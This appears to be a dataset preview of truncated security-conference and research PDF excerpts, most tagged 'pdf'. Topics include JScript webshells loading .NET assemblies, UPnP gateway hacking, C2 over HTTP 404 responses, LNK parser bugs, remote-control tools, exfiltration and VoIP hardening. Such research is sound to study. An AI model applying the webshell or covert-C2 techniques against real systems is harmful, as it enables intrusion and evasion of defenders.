text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
1
Jscript加载Assembly踩坑记
前⾔
理论⽀持
Assembly
从Jscript到C#
踩坑过程
问题解决
最后
@yzddmr6
最近想要给As-Exploits增加aspx类型的⽀持,就研究了⼀下冰蝎跟哥斯拉的实现。
由于冰蝎跟哥斯拉都采⽤的C#类型的shell,所以可以直接调⽤系统的⼀些api,并且可以加载任意的
shellcode。⽽蚁剑采⽤的是传统的Jscript。就想找个办法把它们两者结合起来,⽤Jscript加载C#的
assembly,以此来达到兼容原有shell类型的⽬的。
但是在实现的过程中踩了⼀些坑,所以就写下这篇⽂章记录⼀下。
这⾥要先提到⼀个概念叫Assembly,引⽤⼀下rebeyond师... | pdf |
UPnP mapping
Daniel Garcia
(FormateZ)
Toor.do
Introduction
● Who am I ?
● What is UPnP(Universal Plug and Play) ?
● What is an IGD(Internet Gateway Device) ?
● How many IGD devices are on on-line ?
UPnP hacking timeline
2001 – Ken from FTU – Three windows UPNP DoS attacks
2001 – Eeye – Multiple remote BoF XP/ME/98
UP... | pdf |
我们知道hack都会使用C2(命令和控制)控制受感染的主机系统。这些C2中的大多数都
由大型僵尸网络控制,Hack只是简单地使用其中一些来访问系统,使他们可以转到另一
台设备中去或窃取凭据并获得对系统的“合法”访问。
我已经看到或听说过许多类型的C2,例如IRC,p2p,DNS,Twitter,Gmail,ICMP等。
C2隐藏流量家族越来越大,并且实现C2的方式每天都变得更具创造性。我很少为听到任
何新的C2感到惊讶。直到有一天与John Strand进行了交谈,他提到了可以使用HTTP
404 – File Not Found的C2 。这…引起了我的注意。作为安全专家,我知道这些以前C2
技术中的大多数很容易被检测和阻止。
尽... | pdf |
本电子书为某站收费 VIP
VIP
VIP
VIP 资源
由 灰鸽子网络资源分享社区 免费共享
灰鸽子网络资源分享社区,,,,致力为大家提供最新最全最优秀的网络资源!
论坛主要负责提供各类优秀视频,优秀书籍以及各类优秀源码资源。
网赚,编程,逆向,建站,安全这几个大方向。其中以 网赚,编程,逆向为主打方向。
http://www.huigezi.cc
http://www.huigezi.cc
http://www.huigezi.cc
http://www.huigezi.cc <<<< 近期论坛经常被某些收费站 DDOS
DDOS
DDOS
DDOS 攻击 >>>>
http://www.duominuo.cc
http://w... | pdf |
Guidelines for Securing Your VoIP PBX
Unregistered436 / Patrick McNeil – July 2015
Information Leakage Prevention (Confidentiality)
Block scanners with firewall rules or a VoIP security
appliance that matches on signatures of known
scanners and/or credential cracking behaviors (See
our iptables rules).
Change th... | pdf |
From LNK to RCE
Finding bugs in Windows Shell Link Parser
Lays
Who am I - Lays
• Senior Researcher at TeamT5
• Focus on Reverse Engineering / Vulnerability Research
• MSRC Most Valuable Security Researcher 2019 / 2020
• Acknowledged by Microsoft / Samsung / NETGEAR / Synology …
• HITCON / 217 CTF Team
• Co-Founder of P... | pdf |
指令型遠控軟體輕鬆談
指令型遠控軟體輕鬆談
簡報者
簡報者
Kelp
Kelp
kelp@phate.tw
kelp@phate.tw
PDF created with pdfFactory Pro trial version www.pdffactory.com
簡介
簡介
u
u 了解指令型遠端操控軟體的基本架構
了解指令型遠端操控軟體的基本架構
PDF created with pdfFactory Pro trial version www.pdffactory.com
訓練大綱
訓練大綱
u
u 單元
單元 11:何謂遠控軟體
:何謂遠控軟體
u
u 單元
單元 22:遠控軟體分析
:遠控軟體分析
u
u 單元
單元 33... | pdf |
研发运营一体化(DevOps)
标准体系及能力成熟度模型解读
萧田国
DevOps时代社区发起人
高效运维社区发起人
个人介绍
萧田国
高效运维社区 发起人
DevOps 时代社区 发起人
DevOps 标准体系 联合发起人
DevOpsDays 中国 联合发起人
开放运维联盟主席
复旦大学特聘讲师
分享内容
1、DevOps 及缘起
2、DevOps 能力成熟度模型 解读
3、DevOps 能力成熟度模型 核心贡献者
4、DevOps 能力成熟度模型 本次重磅发布
5、DevOps 能力成熟度模型 评估参与办法
DevOps 及缘起
• 2008年,Patrick Debois 等初次提出 DevOps
• 2009年,Patri... | pdf |
Esoteric Exfiltration
Willa Riggins
Who Am I?
Seriously, people. Does
someone know? Cause I don’
t.
●
Senior Penetration
Tester @ Veracode
●
FamiLAB Member
●
DC407 Point of Contact
●
OWASP Orlando Marketing
Coordinator
●
BSides Orlando Social
Media Lady
●
@willasaywhat on
Twitter
Exfiltration 101
What Is It?
“Data... | pdf |
January 17 2003
Whistleblowers and Team Players – an Islands in the Clickstream
It was only after whistleblowers came out of the closet during the Great Deflation that
Time Magazine honored the practice of what team players call “ratting out your pals.”
Conservative magazines like Time may give lip service to whist... | pdf |
Katana:
Portable Multi-Boot Security Suite
JP Dunning
DefCon 2010
© Shadow Cave LLC
JP Dunning
Graduate Student:
Computer Science, Virginia Tech
Research Focus:
Wireless and Portable Security
Website:
www.hackfromacave.com
© Shadow Cave LLC
To Many Tools!
● Finding Tools
● Cases of CDs
– Keeping up with disks
● Tools... | pdf |
AddHandler example-handler .sum
application/x-httpd-twf
application/x-httpd-twf
mod_twf.so——
0x00
0x01
cs:_Z15ub_error_handleP11request_rec_ptr //
cs:_Z17mobileapp_handlerP11request_rec_ptr //mobileapp
cs:_Z16webstore_handlerP11request_rec_ptr //webstore
cs:_Z12nexttwf_mainP11request_rec_ptr //nexttwf... | pdf |
CREATING THE DEFCON
CHINA 1.0 BADGE
joe Grand aka kingpin
introduction / badge
history
• bring community together through interactivity
• create game to encompass the defcon
experience
• simple design that could be expanded during/
after defcon
• interactive, command-based menu for additional
exploration
goa... | pdf |
Version 3.0
DEFCON 10
August 2002
Anatomy of Denial of Service
Mitigation Testing
Version 3.0
Agenda
• Why Test?
• Methodology
• Challenges and Lessons Learned
• Findings
Version 3.0
DOS-3
Denial of Service
Mitigation Testing
Version 3.0
WHY?
• Desire to Protect
Infrastructure
Data
Business Continuity
• Evalua... | pdf |
more
more
embedded
embedded
systems
systems
FX of Phenoelit
Las Vegas 2003
Agenda
Agenda
Hacking the Matrix
GSM 3G Basics
GPRS backbone hacks
Anonymous HTTP via WAP
Siemens S55 Vulnerabilities
Phenoelit‘s usual Cisco Øday
vulnerability and exploit
Hacking the MATRIX
Hacking the MATRIX
Enterasys Matrix E1
Vulner... | pdf |
“Being in the Know”
An overview to
Scanning modern radio systems
Presented by:
Brett & Taylor
Defcon 15
The Basics
• Simplex
– One frequency shared by multiple stations
– Limited coverage
• Tones
– Continuous Tone Coded Squelch System
(CTCSS)
• Private Line (PL)
– Digital Coded Squelch (DCS)
• Repeaters
– Two frequen... | pdf |
Kubernetes集群渗透
攻击者视角中的Kubernetes
Zhaoyan Xu
资深研究工程师
Palo Alto Networks
2019年5月29日
Tongbo Luo
首席AI安全科学家
JD.com
日程
背景
Kubernetes的安全特性
攻击方式
横向运动实践
答疑
背景
➢Kubernetes在全球范围内广受欢迎
➢ 所有主流云提供商都提供K8S集群服务,如AKS / EKS / GKE等
➢ 根据iDatalabs[1] 的报告,大约有3,804家公司使用K8进行Web应用程序部署
➢ 年度用户增长率超过150%
➢K8的安全性如何?
➢ K8S是否容易受到传统攻击?
➢ 什么是K8S群集的新攻击方式?... | pdf |
Laboratory for Dependable Distributed Systems • RWTH Aachen University
Far More Than You Ever
Wanted To Tell
Hidden Data In Document Formats
Maximillian Dornseif
at Defcon 2004, Las Vegas
Maximillian Dornseif • Laboratory for Dependable Distributed Systems • RWTH Aachen University
Warning
• When you read this this sli... | pdf |
APT与新威胁论坛
2
网络安全威胁中的商业军火
3
从HackingTeam说起
商业化间谍软件现状
商业军火带来的问题
可以采取的应对策略
4
从 说起
成立时间
2003年
创始人
David Vincenzetti(CEO)
Valeriano Bedeschi(CIO)
核心人物
Alberto Ornaghi(软件架构师)
Marco Valleri(进攻安全管理)
总部
米兰,意大利
免费开源
内网安全审计工具
基于MITM实现
“第一个面向警方
的商用黑客软件 ”
头像取自领英( Linkedin)
5
从 说起
部门
人数
管理
... | pdf |
2021$
Skrull$Like$A$King!$
從重兵看守的天眼防線殺出重圍
aaaddress1@chroot.org
April&21,&2021
2
Sheng-Hao$Ma$
Threat&Researcher&at&TXOne&Networks
• Core$member$of&CHROOT&Security&Group&
• Over$10-year$experience$in&reverse&engineering,&Windows&
vulnerability,&and&Intel&8086.&
• Spoke$at&S&P,&BlackHat,&DEFCON,&HITB,&HITCON,&VXCON,&
RO... | pdf |
How To Make Friends
How To Make Friends
&
&
Influence Lock Manufacturers
Influence Lock Manufacturers
Schuyler Towne & Jon King
Schuyler Towne & Jon King
DEFCON 16, 2008
DEFCON 16, 2008
Reviewing this on the DEFCON 16 DVD? Be sure to check ndemag.com/DC16 for updates.
Much of the material covered in this talk is ... | pdf |
C艹学习笔记
本笔记主干基于书籍《C艹面向对象程序设计教程(第4版)》,在此基础上会有所扩展。
内容如有不对之处,希望大家能够指出并私信我。
我的个人博客:https://www.kn0sky.com/
Web版笔记:https://wiki.kn0sky.com/#/note_cpp/README
第一章:面向对象程序设计概述
面向过程与面向对象
面向过程程序设计的主要特征是:程序由 过程定义 和 过程调用 组成
程序 = 过程 + 调用
面向对象程序设计的主要特征是:程序由类的定义和类的使用组成(一切消息由向对象发送消息来实
现,对象收到消息启动相关方法来完成)
程序 = 对象 + 消息
面向对象程序设计基本概念
对象:对象由数... | pdf |
apache overview
0x00
twf.soapache
0x01 helloworld
demo
apacheapache
apachehookexample
1 handler
httpd.conf
AddHandler example-handler .sum
apache.sumr->handler“example-handler”
handlerexample-handler
2
module AP_MODULE_DECLARE_DATA example_module =
{
STANDARD20_MODULE_STUFF,
NULL,
NULL,
NULL,
... | pdf |
从WEB脚本漏洞到客户端应用的
远程命令执行
@gainover
XSS、CSRF、SQLi …
水稻、microRNA、DNA methylation …
关于我
昵称: Gainover
团队: PKAV WEB安全团队 (双螺旋安全实验室)
标签:前端开发,十年生物,乌云,WEB安全
Javascript、 VBscript、Flash actionscript …..
一些老案例 。。。
浏览器 external API 设计不当 + 特权域边界绕过
攻击页面 -> XSS -> se.360.cn -> Install('ExtWebMail','1.1.0.
1013','360邮件通','http://www.w... | pdf |
#BHUSA @BlackHatEvents
Trying to be Everything to Everyone:
Let’s Talk About Burnout
Stacy Thayer, Ph.D. MBA
@drstacythayer
www.linkedin.com/in/stacythayer
#BHUSA @BlackHatEvents
Information Classification: General
About This Talk
• What is Burnout and What is Unique About the Security Industry
• The Problem with ... | pdf |
Face Swapping Video Detection
with CNN
Wang Yang, Junfeng Xiong,
Liu Yan, Hao Xin, Wei Tao
Baidu X-Lab
Face Swapping Video Detection with C
NN
• Deepfakes Video
• A simple and effective CNN
• Face recognition based method
Deepfakes Video
When Face Recognition Systems Meet D
eepfakes
Vulnerable Face comparison before... | pdf |
KERNEL WARS:
KERNEL-EXPLOITATION
DEMYSTIFIED
Introduction to kernel-mode
vulnerabilities and exploitation
•
Why exploit kernel level vulnerabilities?
– It's fun!
– Relatively few are doing it
– Bypasses defense mechanisms and restrictions
Introduction to kernel-mode
vulnerabilities and exploitation
•
Why exploit k... | pdf |
Credit Card Networks 101 What they are, and how to secure them
by Robert Imhoff-Dousharm
About this document
While this serves as a simi-detailed account of said speech at Def-Con 11, it does leave holes in material to
be presented. Some things are better spoken out, and better interpreted by mannerisms and body lan... | pdf |
Visual Security Event Analysis
DefCon 13 Las Vegas
Raffael Marty, GCIA, CISSP
Senior Security Engineer @ ArcSight
July 29, 2005
*
Raffael Marty
2
Defcon 2005 Las Vegas
Raffael Marty
►Enterprise Security Management (ESM) specialist
►OVAL Advisory Board
(Open Vulnerability and Assessment Language)
►ArcSight Research & De... | pdf |
Don’t Fuck It Up!
Zoz
jackdawsart.com
Unjust laws exist: shall we be content to obey
them, or shall we endeavor to amend them,
and obey them until we have succeeded, or
shall we transgress them at once?
—Henry David Thoreau, Civil Disobedience
FUCK IT UP
⇥⇤⌅⇧⌃⌥
Tradecraft
Perceptual Biases
Expectations
Resistance
Am... | pdf |
Goodbye Memory Scraping
Malware
Hold Out Till "Chip And Pin”.
Weston Hecker Security Expert With KLJ
Systems Network
Analyst/Penetrations
Tester/President Of Computer
Security Association Of
North Dakota
#westonhecker #skimbadsoftware
Who Am I What Do I Do What's the Talk
About,
• About Me: Speaker at Defcon 22 ... | pdf |
服务器可信与硬件安全实践
目录
0 1
•
启动安全威胁
•
政策与行业
•
腾讯实践探索
启动安全威胁
0 1
服务器系统构成
启动安全威胁
0 1
启动链威胁
BMC
BOOT
&BMC&OS
BOOT
&BMC
NIC
&write
SPI&flash
PCH
BOOT
&ME&&&NIC
BOOT
UEFI
BOOT
Firmware
Update
OS
BOOT
SMM
Handler
&write
SPI&flash
Opt1Roms
3rd1NIC
GPU
FPGA,etc
MotherBoard
SPI&Flash
AC&Power&On
BMC
SPI&Flash
RAM
RAM
红色:已知在野案例
橙色:实验案例... | pdf |
Exploiting Windows
Exploit Mitigation
for ROP Exploits
Omer Yair
DEF CON 27
• Omer Yair
• TDAD Endpoint Team Lead at Symantec
• Speaker at DerbyCon, Virus Bulletin, Zero Nights
• Photography BFA Graduate
• Exhibited at multiple exhibitions
• Photo book in the makings
• @yair_omer
Who Am I?
Vote Sloth by Grant Shepley... | pdf |
快手纵深攻防体系建设
分享者简介
姓名:黄浩 (浩天)
职务:快手安全蓝军(攻)负责人
经历:十余年信息安全从业经历,主打攻防能力建设
目录
一、四维时空红蓝对抗推演
二、面对面的纵深攻击演练
三、背对背的目标斩首行动
四、自适应的纵深防御体系
一、四维时空红蓝对抗推演
一、四维时空红蓝对抗推演
“纵深”这个词,空间换取时间,提到空间、时间,又会联想到爱因斯坦的“相对论”,四维时空,你可以
洞察过去、预见未来。红蓝对抗演练,更像是四维时空的产物,将未来可能发生的威胁和风险提前感知,所以
蓝军更像是未来部队!
一、四维时空红蓝对抗推演
红蓝对抗是对未来可能发生的安全风险进行推演,将外部风险、内部风险、以及不可预见的未知风险进行
提前排... | pdf |
When TLS Hacks You
JOSHUA MADDUX
Demo
Overview
Where I Started
Testing Approach
Implications
Concrete Vulnerabilities
Defense
SSRF
Send a URL,
server hits it
SSRF
Send a URL,
server hits it
Common in
webhooks &
Apple Pay
support
https://www.youtube.com/watch?v=m4BxIf9PUx0
EC2 IMDS V1
Easy! Just se... | pdf |
1
Hijacking Arbitrary .NET Application Control
Flow
Topher Timzen
&
Ryan Allen
Southern Oregon University Cybersecurity Research Lab
F
ABSTRACT
This paper describes the use of Reflection in
.NET and how it can be utilized to change
the control flow of an arbitrary application at
runtime. A tool, Gray Storm, will be intro... | pdf |
文件上传反制跳板站点
本篇文章主要介绍一次通过黑客跳板站点,获取攻击者 IP 案例。利用前期的
信息收集对跳板站点进行渗透测试,一步步取证攻击者的攻击手法、工具和 IP 的
过程。
目录
文件上传反制跳板站点 ........................................................................................................................ 1
一、事件背景 .................................................................................... | pdf |
101 Ways to Brick Your
Hardware
(With some un-bricking tips sprinkled in for good measure)
Joe FitzPatrick & Joe Grand (Kingpin)
Overview
•What’s a Brick?
•Kinds of Bricks
•001: Bricking Firmware
•010: Bricking PCBs
•011: Bricking Connectors
•100: Bricking ICs
•101: Bricking ‘WTF’ scenarios
•Recap and Best Prac... | pdf |
安全认证相关漏洞挖掘
拿到⼀个系统⼤多很多情况下只有⼀个登录⼊⼝,如果想进⼀步得到较为⾼危的漏洞,只能去寻
找权限校验相关的漏洞,再结合后台洞,最终得到⼀个较为满意的漏洞。
这⾥列出⼀些较为常⻅的安全认证配置:
Spring Security
Apache Shiro
服务器本身(Tomcat、Nginx、Apache)401 认证
Tomcat 安全认证(结合web.xml) ⽆需代码实现
JSON Web Token
以上只是简单列出了⼀些笔者⻅过常⻅的安全认证配置组件。不同的鉴权组件存在异同的审计思
路。
⼀、寻找未授权
这是笔者第⾸先会⼊⼿去看的点,毕竟如果能直接从未授权的点进⼊,就没必要硬刚鉴权逻辑
了... | pdf |
2022/4/29 02:46
Evernote Export
file:///C:/Users/jiushi/Desktop/JavaWeb 内存马技术归纳.html
1/12
环境:适用于tomcat
-------------------------------------------------------
前言:
对于各类Java 容器的内存马主要是需要获取context
为什么context 对象这么重要呢,
对于能达成的目的:context拥有当前中间件或框架处理请求、保存和控制servlet对象、保存和控制filter对象等功能的对象。
----------------------------------------... | pdf |
Speaking with Cryptographic Oracles
Daniel “unicornFurnace” Crowley
Application Security Consultant, Trustwave - Spiderlabs
The Speaker and the Presentation
A quick introduction and a few distinctions
Copyright Trustwave 2010
Confidential
The Speaker
•
Daniel Crowley
•
Web application security d00d
•
IANAC... | pdf |
前言
想起前段时间,我是非常抵触看官方文档的。官方文档是什么东西,我就算自己看源码学,我也不会看
你文档一点!现在发现文档是真的香啊。
那之前我想自定动作的时候, 我头是真的铁. 我居然自己看: https://b23.tv/NQuKiI, 实际上人家官方就有
详细的文档
新版写的写法
我大致翻了一下文档, 权限认证呢?我记得阅读 delete_selected() 源码的时候。是有权限认证的呀.
难道新版不需要了?仔细翻了一下,原来注解可以限制权限了。
我去翻了一下源码,新版本(3.2.3)的默认动作加上了注解。设置了所需权限和描述.
权限认证漏洞
我开始担心起来. 是否有人没有注意到需要设置权限或进行权限认证呢 ?更坏的情况... | pdf |
CCD CoE · February 9, 2011
Sun Tzu and Cyber War
Kenneth Geers
Naval Criminal Investigative Service (NCIS)
Cooperative Cyber Defence Centre of Excellence (CCD COE)
Tallinn, Estonia
Abstract
Cyberspace is a new warfare domain. Computers and the in-
formation they contain are prizes to be won during any military
... | pdf |
Jade
jade
jade
addwith plugin is not a function options.selftruejs
jsnode.line
{"__proto__":{"self":"true","line":"222222222"}}
{"__proto__":{"self":"true","line":"2,jade_debug[0].filename));return 123;//"}}
{"__proto__":{"self":"true","line":"2,jade_debug[0].filename));return
global.process.mainModule.require('child... | pdf |
So You Think Your Domain
Controller Is Secure?
Justin Hendricks
@Script_Happens
Abstract
Domain Controllers are the crown jewels of an
organization. Once they fall, everything in the
domain falls . Organizations go to great lengths to
secure their domain controllers, however they
often fail to properly secure ... | pdf |
Under the iHood
DEFCON 16
Cameron Hotchkies 1
1chotchkies@tippingpoint.com
DEFCON 16
Hotchkies ( chotchkies@tippingpoint.com )
Under the iHood
DEFCON 16
1 / 50
About Me
Work at TippingPoint’s Digital Vaccine Labs
Responsible for vuln-discovery, patch analysis, product security
Keep tabs on us at http://dvlabs.tippingpo... | pdf |
Weaponizing the Web
More Attacks on User Generated Content
Saturday, August 1, 2009
Black Hat USA 2009
Comrades
Citizen: Nathan Hamiel
Senior Consultant - Idea InfoSec
Associate Prof @UAT, Hexagon Security Group
23rd Degree Mason, LavaRolling Enthusiast
Citizen: Shawn Moyer
Principal Consultant - FishNet Security
Douch... | pdf |
pin2pwn: How to Root
an Embedded Linux
Box with a Sewing
Needle
Brad Dixon - Carve Systems
DEF CON 24
• It works
• Easy
• Teachable
• Dramatic
“USEFUL NOVELTY”
• Risky
• Crude
• Perhaps redundant
Demo
Prior Art
• Significant body of work around fault injection
and glitching at the IC level for secure processo... | pdf |
我是衬衫 忍者的帅气同学罢了 昨天晚上睡觉前做了两个小时的DarkCon的 CTF 然后今天我
看题目更新了 正好在向忍者师傅语音传授如何变得向我一样帅 然后我就发了题目链接给
他
1. WTF PHP
直接上传 php 后缀的文件没有任何的限制很简单 然后进入之后 phpinfo 看 disable_function
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcnt
l_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,
pcntl_wtermsig,pcntl_... | pdf |
An Undergraduate Security
Curriculum
Daniel J. Burroughs
University of Central Florida
About myself
• Assistant Professor at UCF
• Research includes
– Correlation of distributed network sensors
– Law enforcement data sharing network
University of Central Florida
•
Established in 1963
•
Part of the Florida State Univer... | pdf |
Trojan-tolerant Hardware
+ Supply Chain Security in Practice
Vasilios Mavroudis
Doctoral Researcher, UCL
Dan Cvrcek
CEO, Enigma Bridge
Who we are
Vasilios Mavroudis
Doctoral Researcher, UCL
Dan Cvrcek
CEO, Enigma Bridge
George Danezis
Professor, UCL
Petr Svenda
Assistant Professor, MUni
CTO, Enigma Bridge
Highlights
▪... | pdf |
FILED
OPEN COURT
IN THE UNITED STATES DISTRICT COURT FOR THE
EASTERN DISTRICT OF VIRGINIA
Alexandria Division
J 6 zuiz
CLERK, U.S. DISTRICT COURT
ALEXANDRIA. VIRGINIA
UNITED STATES OF AMERICA
Criminal No. 1:12CR3
Count One: 18 U.S.C. § 1962(d) -
Conspiracy to Commit
Racketeering
Count Two: 18 U.S.C. §371 -
Conspiracy t... | pdf |
WebLogic CVE-2021-2294 JDBC
2021112,V-LabOracleWeblogic Server JDBC,2021421
Oracle
201911Yang ZhangBlackHat,MySQL JDBC https://i.
blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf
WebLogicJDBC
jdbcObjectInputStream.readObjectWebLogic
JDKJEP290ObjectInputFilterObjectInputS... | pdf |
译者序
本书由 kuang110 和我共同翻译完成,其中笫 2、3、4、5、6 章为 kuang110 翻译,其它
的由本人翻译。由于是两人翻译的,而每个人的翻译风格可能会不同,所以,当你在书中看
到一个单词有两个完全不同的翻译时请不要惊讶,且由于本人翻译水平有限,不足之处在所
难免,但在翻译时我会尽量避免用一些晦涩难懂的长句。
本书的所讲的主要内容请看介绍部分,个人对本书的评价是适合有 C 语言基础而且有
对驱动开发有一定的了解的人阅读,因为本书是介绍 rootkit 而不是介绍驱动开发的,所以
对于什么是 DriverEntry,什么是卸载例程这些不会详细的讲解。本书适合于 rootkit 的入门,
讲的都是比较基础的东西,里面... | pdf |
SQLBYPASS
sql,fuzzpoc
bjfytzs.aliyuncs.com/vul_poc_query?uuid=68dde649-bc6c-4c9e-8e4c-
cb410977a53e&poc=hello_world'||'
,
fuzzfrom, ,ip
,ua+cookie,payload
poc_data
bjfytzs.aliyuncs.com/vul_poc_query?uuid=68dde649-bc6c-4c9e-8e4c-
cb410977a53e&poc=hello_world'%27%26%26IFNULL(ascii(substring((select{x%2
0table_name}from%... | pdf |
Plug For Plug-Ins
Burning oil-based fuels, in addition to its political
and economic problems, is the single largest
contributor to U.S. greenhouse gas emissions. The
interim strategy of increasing fuel efficiency of
gasoline powered cars relies on a continuing
commitment to gasoline. In parallel, strategies are ... | pdf |
针对域证书服务的攻击(3)- ESC3
0x01 前言
在ESC1的利用的时候,好多小伙伴遇到一个错误,借用@Rcoil同学的图。解决方法也在星球,有@Rcoil
同学形成的文档。遇到这个错误的同学可以去看下。这个错误主要是因为2016以下的系统不支持这个
COM接口,因此需要改下代码。我开始以为是证书服务器16以下会出这个问题,但是我自己搭建12系统
的证书服务器环境发现并没有报错,因此我怀疑是域控在16以下。这算一个遗留问题,具体这个请求是
发送到域控还是证书服务器,需要后面分析,先mark下。
回归正题,今天时ESC3的分析,ESC3主要滥用的是错误配置了证书申请代理模板(Enrollment Agent
Templates... | pdf |
DefCon (China) 1, Beijing 2019
Breaking the back end!
Gregory Pickett, CISSP, GCIA, GPEN
Chicago, Illinois
gregory.pickett@hellfiresecurity.com
Hellfire Security
Overview
Transit Systems
Reverse Engineering
My Discoveries
The Exploit
The Lessons
Brief History
The Anatomy of a Subway Hack
(2008)... | pdf |
Invisible Access
Opening New Doors to Insecurity
Marc Weber Tobias - Matt Fiddler - Tobias Bluzmanis
©2009 Security.org
Agenda
• Standards and Requirements
• Electro-Mechanical Locks
• Critical Infrastructure and
Vulnerabilities
• Real World Threats
• Case Study: Electronic
Access Control technology
Standards:
Mechanic... | pdf |
Mark Ryan del Moral Talabis
Dangerous Minds: The Art of
Guerrilla Data Mining
DEFCON 2009
2
Background
“Security Analytics”:
Concept of using data mining and AI in
security
Presented techniques and theories that
we could use
This Talk:
Move from theory to practical
applications
Provide scenarios and e... | pdf |
#BHUSA @BlackHatEvents
Glitched on Earth by Humans:
A Black-Box Security Evaluation of the SpaceX
Starlink User Terminal
Lennert Wouters
@LennertWo
COSIC
#BHUSA @BlackHatEvents
Starlink 101
Laser link
Lower Earth Orbit (LEO)
Space
Earth
User Terminal (UT)
Gateway
Internet
Satellite
2
This talk
Source: u/darkpenguin22... | pdf |
How To Get Your Message Out
Bruce Sutherland - KO4IN
DEFCON 19
When Your Government Turns Off The Internet
Bruce Sutherland - KO4IN
DEFCON 19
/usr/bin/whoami
Information Systems field 20+ years
Designed and implemented networks since ARCNet was
standard
Writing code professionally 15+ years
Licensed Ham Radio o... | pdf |
起因
昨天在微信群看到个链接
搜了下发现是铁威马的NAS,文章没写解密过程,今天闲来无事就分析了下
0x00 简析结构
铁威马的NAS系统的UI使用PHP开发且文件为加密状态,解压打开后发现加载了
php_terra_master.so 文件,丢到 IDA 里发现是魔改的 phpscrew 加密
网上找了几篇解密的文章发现都不成功,怀疑密钥被更改
0X01 找密钥
由于 phpscrew 魔改版会把 md5 加密后的秘钥的前16位写入被加密的文件,所以对历史版本的PHP文
件和新的文件进行对比,对比后发现密钥确实被修改
然后下载了历史版本 4.1.27 和 4.2.28 的版本,发现关键库文件被修改过
用 Bindiff 打开这两个... | pdf |
pkexec
0x00
CVE-2021-4034pkexec
CVE-2021-4034
GCONV_PATH
bypass hids
LD_PRELOAD
LD_PRELOADGCONV_PATH
0x01 pkexec
swing
1.
2.
3. so
4. RCE
pkexec
638
701clearenv
638701
g_printerrGCONV_PATH
clearenvLD_PRELOAD
pkexec
clear
execvLD_PRELOAD
0x02 disable functionputenv
execdisable functionputenvLD_PRELOADpkexec
pkexe... | pdf |
Classification: Internal
www.nviso.eu
.NET reflection for post exploitation
tradecraft in an EDR world.
Classification: Internal
Jean-François Maes
Creator of redteamer.tips
Host of “The voices of infosec” podcast
Contributor to SANS SEC560 and SEC699
Devourer of chicken and other proteins
#RedTeamFit
# Whoami
Classi... | pdf |
You're Leaking Trade Secrets
D E F C O N 2 2
You're Leaking
TRADE SECRETS
You're Leaking Trade Secrets
You're Leaking Trade Secrets
You're Leaking Trade Secrets
You're Leaking Trade Secrets
You're Leaking Trade Secrets
You're Leaking Trade Secrets
Michael Schrenk
You're Leaking Trade Secrets
You're Leaking Trade Sec... | pdf |
Virtualization: Enough Holes to
Work Vegas
Defcon 15
Las Vegas, 2007
D.J. Capelis
University of California, San Diego
Introductory Notes
● Mostly known issues
● Mostly design flaws, not entirely bugs
● Documented behavior
● (So slightly less testing)
– VMWare Server, not ESX or VI3.
● This is still untenable
Overview
... | pdf |
钓鱼城杯-WP
Author:Nu1L Team
钓鱼城杯-WP
Crypto
confused_flag
crypto0
WEB
easyseed
easyweb
gamebox
zblog
RE
Faker
Goodbye
reg
APK
LinkChecker
PWN
fsplayground
unknown
veryeasy
Misc
whitespace
张三的恶行
Crypto
confused_flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# context.log_level = 'debug'
flag = [{} for _ ... | pdf |
5space WrtieUp By Nu1L
5space WrtieUp By Nu1L
Pwn
H3llOR0P
Crypto
5_vgcd
Reverse
5_crackme
crackme_2
Web
5_web_BaliYun
5_web_Eeeeasy_SQL
eazylogin
5_web_letmeguess_1
Database
cloudsql_reveage
Misc
sakan
sakana_revenge
5_Misc_m@sTeR_0f
Pwn
H3llOR0P
from pwn import *
# p = process('./H3ll0Rop')
p = remote('123.56.175.221... | pdf |
从软件开发角度解密OWASP TOP 10
应用安全与安全的开发
OWASP TOP 10浅
析
安全开发演化
安全开发现状
企业所面临的安全挑战
S-SDLC落地实现
研发视角解决
OWASP TOP
10
日程
OWASP TOP
10
select id, uname, passwd from users where uname= ’$un$' and passwd=’$pw$'
SQL Injection
XSS
业务逻辑
第三方插件
OWASP TOP 10攻击思
路
安全与我有关系
吗
功能与安全距离
有多远
安全漏洞在哪里
安全离我有多远?
OWASP TOP 10浅
析
安全开发演化
安全开发现状
企业所面临的安... | pdf |
Kernel Exploitation Via Uninitialized Stack
Kees Cook
kees.cook@canonical.com
www.canonical.com
August 2011
2 Kernel Exploitation Via Uninitialized Stack by Kees Cook
20 Minutes!
● introduction
● quick Linux kernel exploitation basics
● audit callers of copy_from_user() for mistakes
● found a flawed function, but you ... | pdf |
Discover vulnerabilities with CodeQL
Security Researcher @ CyCraft
CHROOT’s member
Programming lover 🤓
qazbnm456
@boik_su
Boik Su
Agenda
• Brief introduction to CodeQL
• CodeQL’s Tricks
• Replicate CVEs to find you CVEs
• More powerful pattern finder
• Regression Tests
• ClientDependency Massacre
• Conclusion
3
Agenda
•... | pdf |
Joe Grand Zoz Brooks
More Projects of...
๏ Engineering entertainment program on
Discovery Channel
๏ Four guys building prototypes of crazy things
๏ Followed the design/test/refine process
๏ Limited time & budget per episode
๏ Premiered October 2008 (US), ~February
2009 (World), 2012 (Netflix)
๏ Thir... | pdf |
编译rc1环境
rc1的编译需要配置toolchains文件
在user/.m2目录下面
toolchains可以配置多个jdk的版本 这里9以上应该就可以,我这里使用11来编译。但是mvn的java版本还是1.8。
jep290绕过
JndiManager的lookup到最后还是去调用javax.naming.InitialContext的lookup方法。
所以在后续的利用中仍然存在。这里采用一种绕jep290的方式。dnslog和rmi的端口都是在我自己的vps上面设置的。我
搭建服务器的思路,每三秒register会重新绑定一个恶意对象去请求我的dnslog服务器,生成的是3个随机数。(当然这
里是简单为了验证这个漏洞的存在... | pdf |
日志分析之昨天今天与明天
关于我
• 安全爱好者
• 安全防御研究
• 2012-2015 当当网 网信金融
• 2015-今 万达电商
日志的价值
我们遇到的日志
议程
• 昨天
• 今天
• 明天
昨天
• 那些年,还是iis的天下
• 0day?
• 注入,我喜欢 :)
向当年的软件作者致敬
• awk
• grep
• wc
• uniq
• sort
• 统计top n
• 关键字过滤
确定入侵时间
状态码过滤
类型过滤
IP分析
确定入侵文件
IP访问
确定时间
状态码过滤
–Johnny Appleseed
日志展示界面(可视化)
今天
• 文... | pdf |
关于昨天看到的url:的scheme
0x00 前⾔
